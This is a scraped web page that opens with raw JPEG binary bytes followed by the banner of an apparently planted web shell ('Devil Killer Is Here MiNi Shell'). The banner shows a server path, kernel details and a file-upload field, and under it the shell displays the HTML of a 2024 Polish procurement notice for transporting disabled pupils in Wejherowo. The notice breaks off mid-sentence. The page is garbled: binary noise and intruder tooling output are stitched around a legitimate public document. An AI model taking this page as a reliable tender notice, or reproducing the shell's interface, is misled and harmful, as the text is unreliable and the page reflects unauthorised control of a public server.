JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240717/0041785001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Transport uczniów niepełnosprawnych zamieszkałych na terenie Miasta Wejherowa do/z placówek oświatowych w roku<br/>szkolnym 2024/2025 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">WEJHEROWSKIE CENTRUM USŁUG WSPÓLNYCH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191250148</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 12 Marca 195</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wejherowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">centrum@wcuw.wejherowo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wcuw.wejherowo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Transport uczniów niepełnosprawnych zamieszkałych na terenie Miasta Wejherowa do/z placówek oświatowych w roku<br/>szkolnym 2024/2025 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7d363bb3-6e85-43d5-9feb-fed7a1b26be9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00417850</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00049662/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Transport dzieci niepełnosprawnych zamieszkałych na terenie Miasta Wejherowa do/z placówek oświatowych w roku szkolnym 2024/2025.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7d363bb3-6e85-43d5-9feb-fed7a1b26be9 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7d363bb3-6e85-43d5-9feb-fed7a1b26be9</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się przy użyciu Platformy e–Zamówienia, która jest dostępna<br/>pod adresem https://ezamowienia.gov.pl<br/>2) Korzystanie z Platformy e–Zamówienia jest bezpłatne.<br/>3) Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga<br/>posiadania konta na Platformie e–Zamówienia, ani logowania.<br/>4) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia<br/>publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia.<br/>5) Szczegółowe informacje na temat zakładania kont podmiotów, wymagań technicznych<br/>oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie<br/>internetowej https://ezamowienia.gov.pl<br/>oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>6) Możliwość korzystania w postępowaniu z Formularzy do komunikacji w pełnym<br/>zakresie wymaga posiadania konta Wykonawcy na Platformie e–Zamówienia oraz<br/>zalogowania się na Platformie e–Zamówienia.<br/>7) Do korzystania z Formularzy do komunikacji służących do zadawania pytań<br/>dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e–Zamówienia.<br/>8) Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do<br/>komunikacji” wynosi 25 MB (wielkość ta dotyczy plików przesyłanych, jako załączniki<br/>do jednego formularza).<br/>9) Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z<br/>usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia<br/>określa Regulamin Platformy e-Zamówienia.<br/>10) W przypadku problemów technicznych i awarii związanych z funkcjonowaniem<br/>Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego<br/>dostępnego poprzez formularz udostępniony na stronie internetowej<br/>https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>11)Jeżeli Zamawiający lub Wykonawca przekazują dokumenty elektroniczne za pomocą poczty elektronicznej, każda ze stron na<br/>żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.<br/>12)Zamawiający nie przewiduje komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 RODO informujemy, że:<br/>1)	administratorem danych osobowych jest Dyrektor Wejherowskiego Centrum Usług Wspólnych, ul. 12 Marca 195, 84-200 Wejherowo;<br/>2)	administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: iod@um.wejherowo.pl, telefonicznie: 58 677 71 37;<br/>3)	dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez przeprowadzenia negocjacji;<br/>4)	odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp;<br/>5)	dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia publicznego;<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>8)	posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9)	nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10)	przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WCUW.271.462.2024.JM</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług w zakresie transportu uczniów niepełnosprawnych zamieszkałych na terenie Miasta Wejherowa do/z placówek oświatowych w roku szkolnym 2024/2025. <br/>2.	Uczniowie mają być dowożeni zgodnie z planem zajęć szkolnych we wszystkie dni wynikające z kalendarza roku szkolnego 2024/2025 tj. od poniedziałku do piątku z wyłączeniem przerw świątecznych i dni ustawowo wolnych, najkrótszą trasą zgodnie z zasadą „od drzwi do drzwi” to jest: miejsce zamieszkania ucznia - placówka oświatowa ucznia – miejsce zamieszkania ucznia. <br/>3.	Harmonogram dowozu uczniów ustala Wykonawca dowozu na podstawie otrzymywanych od rodziców uczniów bądź opiekunów planów lekcji lub informacji - należy uwzględnić przede wszystkim indywidualne godziny dowozów uczniów oraz w miarę możliwości łączenie kursów, które zakłada się na poziomie minimum 2% w skali miesięcznego rozliczenia przedłożonego przez Wykonawcę. <br/>4.	Do podstawy ustalenia wartości zamówienia Zamawiający określił liczbę uczniów faktycznie dowożonych w dniu rozpoczęcia procedury udzielenia zamówienia publicznego oraz liczbę dni roku szkolnego 2024/2025, podczas których realizowany będzie dowóz uczniów do szkół i placówek.<br/>5.	Wykonawca powinien przenalizować topografię miasta Wejherowa i pobliskich miejscowości, do których będą dowożeni uczniowie, aby ustalić cenę jednostkową za kurs w jedną stronę.<br/>6.	Opis usytuowania placówek oświatowych – miejsce świadczenia usług:<br/>1)	dowóz do miejscowości, w której znajduję się placówka odbywa się na podstawie złożonych wniosków przez rodziców uczniów .<br/>2)	miejscowości placówek , do których byli dowożeni uczniowie w roku szkolnym 2023/2024 - w nawiasie liczba placówek w danej miejscowości/ liczba uczniów:<br/>Wejherowo (7 / 70), Strzepcz (1 / 1), Rumia (1 / 4). <br/>3)	Zamawiający szacuje, że średnia dzienna długość trasy:<br/>a)	przewozu jednego ucznia od miejsca zamieszkania do placówki oświatowej lub od placówki oświatowej do miejsca zamieszkania na terenie miasta Wejherowa wynosi 4,25 km przyjęta w celu określenia wielkości zadania. Zamawiający zastrzega, że wielkość ta może ulec zmianie, jednak w sporadycznych przypadkach nie powinna przekraczać 8 km.<br/>b)	przewozu jednego ucznia od miejsca zamieszkania do placówki oświatowej lub od placówki oświatowej do miejsca zamieszkania poza teren miasta Wejherowa wynosi 18,50 km przyjęta w celu określenia wielkości zadania. Zamawiający zastrzega, że wielkość ta może ulec zmianie, jednak w sporadycznych przypadkach nie powinna przekraczać 30 km.<br/>4)	Zamawiający zastrzega możliwość zmiany adresu zamieszkania uczniów, zmiany adresu placówki oświatowej oraz zmiany tras przejazdu w czasie trwania umowy. Wykonawcy nie przysługuje z tego tytułu roszczenie. <br/><br/>7.	Opis ilości dni: <br/>1)	Zgodnie z kalendarzem roku szkolnego 2024/2025 planowana ilość dni:<br/>a)	szkolnych to: 186 (we wrześniu – 21, październiku – 23, listopadzie - 19, grudniu – 15, styczniu – 21, lutym- 10, marcu - 21, kwietniu – 18, maju – 20, czerwcu – 18),<br/>b)	natomiast wychowania przedszkolnego to: 249 (we wrześniu – 21, październiku – 23, listopadzie – 19, grudniu – 19, styczniu – 21, lutym - 20, marcu - 21, kwietniu – 21, maju – 21, czerwcu – 20, lipcu – 23, sierpniu – 20).<br/>2)	Zamawiający zastrzega, że ilość dni może ulec zmianie w związku z tym na zmniejszony ilościowo przedmiot zamówienia Wykonawcy nie przysługuje żadne roszczenie względem Zamawiającego, gdy środki finansowe nie zostaną w pełni wykorzystane do upływu terminu realizacji umowy.<br/>8.	Opis ilości uczniów:<br/>1)	Zamawiający na podstawie poprzedniego roku szkolnego - 2023/2024, zakwalifikował do przewozu 75 uczniów z uwzględnieniem:<br/>a)	dowożonych na terenie miasta Wejherowo było 70 uczniów, <br/>-	w tym poruszających się samodzielnie – 67 uczniów, a poruszających się na wózkach inwalidzkich – 3 uczniów, <br/>-	natomiast realizujących wychowanie przedszkolne było 10 uczniów.<br/>b)	dowożonych poza miasto Wejherowo było 5 uczniów, <br/>-	w tym poruszających się samodzielnie – 3 uczniów, a poruszających się na wózkach inwalidzkich – 2 uczniów,<br/>- natomiast realizujących wychowanie przedszkolne nie było uczniów.<br/>2)	dane dotyczące ilości uczniów są wielkościami szacunkowymi, przyjętymi w celu porównania ofert i wyboru oferty najkorzystniejszej. Wykonawcy nie przysługuje żadne roszczenie względem Zamawiającego, gdy środki finansowe nie zostaną w pełni wykorzystane do upływu terminu realizacji umowy. Jednoczenie Zamawiający zastrzega sobie możliwość zwiększenia liczby uczniów dowożonych (szacunkowo o 10 uczniów) do momentu nie przekroczenia całkowitej wartości zamówienia ze względu na absencję szkolną uczniów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Został przedstawiony w rozdziale XIX SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas kursu w jedną stronę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas na podstawienie pojazdu zastępczego w przypadku sytuacji awaryjnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy : <br/>1)	nie podlegają wykluczeniu zgodnie z Rozdziałem IX SWZ;<br/>2)	spełniają warunki udziału w postępowaniu dotyczące :<br/>a)	zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu <br/>w powyższym zakresie.<br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>	Zamawiający uzna warunek za spełniony w zakresie uprawnień, jeżeli: <br/>Wykonawca wykaże, że posiada aktualne uprawnienia do wykonywania działalności to jest: odpowiednie, zezwolenie lub licencję na wykonywanie transportu drogowego osób zgodnie z ustawą o transporcie drogowym lub dokument równoważny.<br/>c)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu <br/>w powyższym zakresie.<br/>d)	zdolności technicznej lub zawodowej:<br/>	Zamawiający uzna warunek za spełniony w zakresie zdolności technicznej, jeżeli: <br/>Wykonawca wykaże, że dysponuje niezbędnymi do wykonania zamówienia narzędziami i urządzeniami technicznymi to jest pojazdami wyprodukowanymi po roku 2008 : <br/>	spełniającymi wymagania techniczne określone przepisami – należy przez to rozumieć pojazdy samochodowe przeznaczone konstrukcyjnie do przewozu nie więcej niż 9 osób łącznie z kierowcą oraz ich bagażu - samochody osobowe lub autobusy przeznaczone konstrukcyjnie do przewozu do 17 osób łącznie z kierowcą - busy; w ilości zapewniającej prawidłową realizację przewozu uczniów,<br/>	oraz co najmniej dwoma pojazdami specjalistycznymi dostosowanymi do przewozu osób niepełnosprawnych poruszających się na wózkach inwalidzkich wskazanych w Rozdziale V SWZ.<br/>	Zamawiający uzna warunek za spełniony w zakresie zdolności zawodowej, jeżeli:<br/>Wykonawca wykaże, że dysponuje niezbędnymi do wykonania zamówienia osobami, które posiadają:<br/>	odpowiednie doświadczenie i uprawnienia do kierowania pojazdami min. 3 lata prawo jazdy odpowiedniej kategorii. Wykonawca musi zapewnić odpowiednią liczbę kierowców niezbędną do prawidłowej organizacji dowozu dla wszystkich uprawnionych osób do dowożenia.<br/>	ukończony kurs z pierwszej pomocy.<br/>	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, spełnienie warunków tiret 1 i 2, Wykonawcy mogą wykazać łącznie. <br/>	W przypadku polegania przez Wykonawcę na zdolnościach podmiotu udostępniającego zasoby, w myśl art. 118 ustawy Pzp, spełnienie warunków tiret 1 i 2, Wykonawca wraz z innym/i podmiotem/ami mogą wykazać łącznie.<br/>2.	Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia, o których mowa w Rozdziale IX ust. 1 i 2 SWZ:<br/>a) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty<br/>niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej (wzór stanowi Załącznik nr 5 do SWZ) Nie jest<br/>wymagane, gdy w postępowaniu uczestniczył jeden Wykonawca.;<br/>b) odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego<br/>właściwego rejestru, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem,<br/>jeżeli odrębne 